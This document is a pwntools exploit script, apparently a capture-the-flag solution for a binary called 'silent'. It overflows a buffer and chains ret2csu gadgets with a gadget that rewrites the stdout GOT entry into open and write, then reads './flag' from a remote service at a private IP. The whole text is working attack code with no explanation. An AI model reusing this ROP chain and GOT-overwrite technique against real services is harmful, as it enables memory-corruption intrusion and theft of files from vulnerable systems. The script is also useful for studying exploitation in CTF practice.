1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73
| from pwn import * import sys
context.log_level='debug' context.arch='amd64'
libc = ELF('./libc.so.6') elf = ELF('./silent') flag = 1 if flag: p = remote('172.10.0.8', 9999) else: p = process("silent") sa = lambda s,n : p.sendafter(s,n) sla = lambda s,n : p.sendlineafter(s,n) sl = lambda s : p.sendline(s) sd = lambda s : p.send(s) rc = lambda n : p.recv(n) ru = lambda s : p.recvuntil(s) ti = lambda : p.interactive() leak = lambda name,addr :log.success(name+"--->"+hex(addr))
ret2csu_front = 0x0000000000400940 ret2csu_behind = 0x000000000040095A magic_gadget = 0x00000000004007e8 stdout_got = 0x601020 bss = 0x602000
def set_offset(target,raw): offset = target - raw if offset < 0: offset = offset + 0x100000000 return offset
def set_vuln(offset,target): payload = flat([ ret2csu_behind, offset, target+0x3d, 0,0,0,0, magic_gadget, ]) return payload
def ret2csu(rdi,rsi,rdx,vuln): payload = flat([ ret2csu_behind, 0,1, vuln, rdi,rsi,rdx, ret2csu_front, 0,0,0,0,0,0,0, ]) return payload
payload1 = b'a'*0x48 + ret2csu(0,bss,0x300,elf.got['read']) + p64(0x400878)
sd(payload1.ljust(0x100,b'\x00'))
payload2 = b'./flag\x00\x00' + set_vuln(set_offset(libc.sym['open'],libc.sym['_IO_2_1_stdout_']),stdout_got) payload2 += ret2csu(bss,0,0,stdout_got) payload2 += ret2csu(3,bss+0x500,0x40,elf.got['read']) payload2 += set_vuln(set_offset(libc.sym['write'],libc.sym['open']),stdout_got) payload2 += ret2csu(1,bss+0x500,0x40,stdout_got) payload2 = payload2.ljust(0x300,b'\x00') sd(payload2)
payload3 = b'a'*0x40 + p64(bss) + p64(0x0000000000400876) sd(payload3.ljust(0x100,b'\x00')) p.interactive()
|